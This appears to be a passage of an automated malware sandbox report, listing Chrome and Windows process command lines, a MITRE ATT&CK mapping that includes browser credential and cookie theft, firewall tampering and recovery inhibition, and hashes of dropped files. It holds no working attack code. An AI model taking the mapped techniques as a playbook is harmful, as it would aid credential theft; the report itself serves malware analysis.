- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=4968,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7468 /prefetch:1
  2⤵
  PID:8840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=5064,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6452 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=6088,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7320 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=6116,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=10452 /prefetch:1
  2⤵
  PID:8496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=4908,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6036 /prefetch:1
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=5128,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:8412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=5412,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7704 /prefetch:1
  2⤵
  PID:408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=5308,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=3356,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:7868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=5908,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:6728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=8264,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:8188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=4444,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9424 /prefetch:1
  2⤵
  PID:8928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=4840,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8188 /prefetch:1
  2⤵
  PID:9332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=8584,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=1740 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=8468,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8268 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=8452,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9124 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=9084,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7928 /prefetch:1
  2⤵
  PID:9744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=8472,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8796 /prefetch:1
  2⤵
  PID:7472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=8792,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7024 /prefetch:1
  2⤵
  PID:7124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=8416,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7988 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=8072,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8588 /prefetch:1
  2⤵
  PID:2564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=10912,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=10948 /prefetch:1
  2⤵
  PID:9956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=10916,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8852 /prefetch:1
  2⤵
  PID:2728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=11228,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=11076 /prefetch:1
  2⤵
  PID:10152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=11340,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4944 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=7268,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8504 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=8136,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3504 /prefetch:8
  2⤵
  PID:9600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=8036,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8280 /prefetch:1
  2⤵
  PID:3996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3492,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9724 /prefetch:8
  2⤵
  PID:7972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=7600,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:7860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=3228,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8100 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=9332,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=10720 /prefetch:1
  2⤵
  PID:6568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=6548,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=11456 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=5872,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9288 /prefetch:1
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=9888,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9240 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=8076,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:5780

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:8908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:8320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 10016 -ip 10016
1⤵
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 8256 -ip 8256
1⤵
PID:10080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9832 -ip 9832
1⤵
PID:7124

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:8648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5280 -ip 5280
1⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5452 -ip 5452
1⤵
PID:8552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4372 -ip 4372
1⤵
PID:4800

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1112345251\manifest.json

Filesize
238B

MD5
15b69964f6f79654cbf54953aad0513f

SHA1
013fb9737790b034195cdeddaa620049484c53a7

SHA256
1bdda4a8fc3e2b965fbb52c9b23a9a34871bc345abfb332a87ea878f4472efbd

SHA512
7eeee58e06bba59b1ef874436035202416079617b7953593abf6d9af42a55088ab37f45fdee394166344f0186c0cb7092f55ed201c213737bb5d5318e9f47908

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1336236363\manifest.json

Filesize
116B

MD5
d20acf8558cf23f01769cf4aa61237e0

SHA1
c4b21384309b0ff177d9cd3aa4198ab327eb2993

SHA256
3493b321a7fc5e183ed6f223ae55ce962541717d0b332d16bdc7cbcadf7e6f78

SHA512
73d082cbd71f6d0f06c7afc1bf63ee41c9a8e501df3e56f21a551b2d369a0afc8306894c8e0a38d0324e2ac403ec506ac1ecd8e9b61a9cb27134a229ccb13725

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\deny_domains.list

Filesize
12B

MD5
085a334bdb7c8e27b7d925a596bfc19a

SHA1
1e4ad53dc335af5c6a8da2e4b4a175f37fafe2f2

SHA256
f51a7acfffec56d6751561966d947d3fd199b74528c07dabdcf5fcb33d5b2e85

SHA512
c883cb43c97a136825c6fd143f539210c234c66f9b76dfd8431f6ff014094e20b9410d7462aadee2344df8ca158def6b9a807e7cadbdfa947f6f8592e7283e34

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\deny_etld1_domains.list

Filesize
6KB

MD5
93c7fc76f7223d043593c999de1c0bea

SHA1
dd7c906c629466fe53a29d3945e31801065b5b1a

SHA256
0db8861eb771d2662ecabd8c7125c5453d6f3d976c14401ecb252e1f85b018d6

SHA512
55c752b20ebf883adaf0bf696fbe7c3f94b06d5bff907b39e9f43358ee7a58336024145b77ba315393609853c54a701ec25592ffc32b9ed3e2ce4857a4186c8e

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\deny_full_domains.list

Filesize
9KB

MD5
a3b6c4249c181157cf292b749209fb49

SHA1
f3704c2d69b8f1c7738104f2d9fadf5ae644702b

SHA256
2edfd6823e18cb7a1e9e6abf571ef33c5be863cb5ea891ffa3df9a06fd0bfe98

SHA512
113df193b92ac3312b4e983434d0fb61fde5f3675ea00687ab6f9c53f17635bc5dba2970a5af6dc176618d962f982ab514b82d9ffbf894e315a31797887d35f0

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\manifest.fingerprint

Filesize
66B

MD5
a287310073c3b178dc97cb38269847da

SHA1
ab283f53827794fffcfbf8603d33a3d9f6a5bbf2

SHA256
3af99da8ebc689d4324a15e3f059e379c9be7e523b5b26efb9261cb507a6f6d3

SHA512
bdd9f96341fc74032c9ae8677e6a06badae1ab60f4ae48ced84853a0a57a16e16c68d636bb821f10fbd06779462ed3fca5d4eb903e5235f519dfdd46b1d7e95c

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\manifest.json

Filesize
176B

MD5
6607494855f7b5c0348eecd49ef7ce46

SHA1
2c844dd9ea648efec08776757bc376b5a6f9eb71

SHA256
37c30639ea04878b9407aecbcea4848b033e4548d5023ce5105ea79cab2c68dd

SHA512
8cb60725d958291b9a78c293992768cb03ff53ab942637e62eb6f17d80e0864c56a9c8ccafbc28246e9ce1fdb248e8d071d76764bcaf0243397d0f0a62b4d09a

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1481845404\manifest.json

Filesize
145B

MD5
a3842aa29862631e5548a02b38a07ffa

SHA1
d4b345c8f29d091bf67df12a17b72df84ff1d24a

SHA256
86408cbb3cb0c03520762e8d59f5dfb8887d68219bef2ce95bb50b5486d6d5bc

SHA512
3f0171c91a973b0910538eca3f2802a8ec54f7b615a525206896f4feeba61332c40089db7b655d156e32a654480cad3ffafa7caa3c042cf6ba94619c0cc93cb8

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Notification\notification_fast.bundle.js.LICENSE.txt

Filesize
551B

MD5
7bf61e84e614585030a26b0b148f4d79

SHA1
c4ffbc5c6aa599e578d3f5524a59a99228eea400

SHA256
38ed54eb53300fdb6e997c39c9fc83a224a1fd9fa06a0b6d200aa12ea278c179

SHA512
ca5f2d3a4f200371927c265b9fb91b8bcd0fbad711559f796f77b695b9038638f763a040024ed185e67be3a7b58fab22a6f8114e73fdbd1cccdda6ef94ff88f3

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt

Filesize
1KB

MD5
8595bdd96ab7d24cc60eb749ce1b8b82

SHA1
3b612cc3d05e372c5ac91124f3756bbf099b378d

SHA256
363f376ab7893c808866a830fafbcd96ae6be93ec7a85fabf52246273cf56831

SHA512
555c0c384b6fcfc2311b47c0b07f8e34243de528cf1891e74546b6f4cda338d75c2e2392827372dc39e668ed4c2fd1a02112d8136d2364f9cab9ee4fa1bd87f5

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-tokenized-card\fr-CA\strings.json

Filesize
2KB

MD5
cd247582beb274ca64f720aa588ffbc0

SHA1
4aaeef0905e67b490d4a9508ed5d4a406263ed9c

SHA256
c67b555372582b07df86a6ce3329a854e349ba9525d7be0672517bab0ac14db5

SHA512
bf8fa4bd7c84038fae9eddb483ae4a31d847d5d47b408b3ea84d46d564f15dfc2bae6256eac4a852dd1c4ad8e58bc542e3df30396be05f30ed07e489ebe52895

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\manifest.json

Filesize
122B

MD5
0d77c27baa669b0714c49b73e68447ea

SHA1
65103c9707e083c5503ad9979560ba1bb7634ae4

SHA256
c853d6a286d9d31a382c6d3fb109d5336d275651950f22b8243289eb6125b516

SHA512
1f011c405ec558229a1f5e2923b38b7054144c66d4c69d658c9c2c371f6cc365317485c274cafcab80bcb88f989b0be4c43c763933de3f86362a79ec1e962ff3

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_227157870\_metadata\verified_contents.json

Filesize
1KB

MD5
68e6b5733e04ab7bf19699a84d8abbc2

SHA1
1c11f06ca1ad3ed8116d356ab9164fd1d52b5cf0

SHA256
f095f969d6711f53f97747371c83d5d634eaef21c54cb1a6a1cc5b816d633709

SHA512
9dc5d824a55c969820d5d1fbb0ca7773361f044ae0c255e7c48d994e16ce169fceac3de180a3a544ebef32337ea535683115584d592370e5fe7d85c68b86c891

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_227157870\manifest.fingerprint

Filesize
66B

MD5
8294c363a7eb84b4fc2faa7f8608d584

SHA1
00df15e2d5167f81c86bca8930d749ebe2716f55

SHA256
c6602cb5c85369350d8351675f006fc58aea20b8abf922a2c64700070daaa694

SHA512
22ed0211822f6f60fe46184fb6e5e7fcb2b3a9d2e19f25fb6e84e1ca3a5d645183959309549cdb07c999b345cfdd9a1351f3474e03fb8d451b0f093d44844d7c

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_227157870\sets.json

Filesize
9KB

MD5
eea4913a6625beb838b3e4e79999b627

SHA1
1b4966850f1b117041407413b70bfa925fd83703

SHA256
20ef4de871ece3c5f14867c4ae8465999c7a2cc1633525e752320e61f78a373c

SHA512
31b1429a5facd6787f6bb45216a4ab1c724c79438c18ebfa8c19ced83149c17783fd492a03197110a75aaf38486a9f58828ca30b58d41e0fe89dfe8bdfc8a004

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1288_691278658\manifest.json

Filesize
1003B

MD5
578c9dbc62724b9d481ec9484a347b37

SHA1
a6f5a3884fd37b7f04f93147f9498c11ed5c2c2d

SHA256
005a2386e5da2e6a5975f1180fe9b325da57c61c0b4f1b853b8bcf66ec98f0a0

SHA512
2060eb35fb0015926915f603c8e1742b448a21c5a794f9ec2bebd04e170184c60a31cee0682f4fd48b65cff6ade70befd77ba0446cc42d6fe1de68d93b8ea640

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping5856_10239844\manifest.json

Filesize
102B

MD5
a64e2a4236e705215a3fd5cb2697a71f

SHA1
1c73e6aad8f44ade36df31a23eaaf8cd0cae826d

SHA256
014e9fc1219beefc428ec749633125c9bff7febc3be73a14a8f18a6691cd2846

SHA512
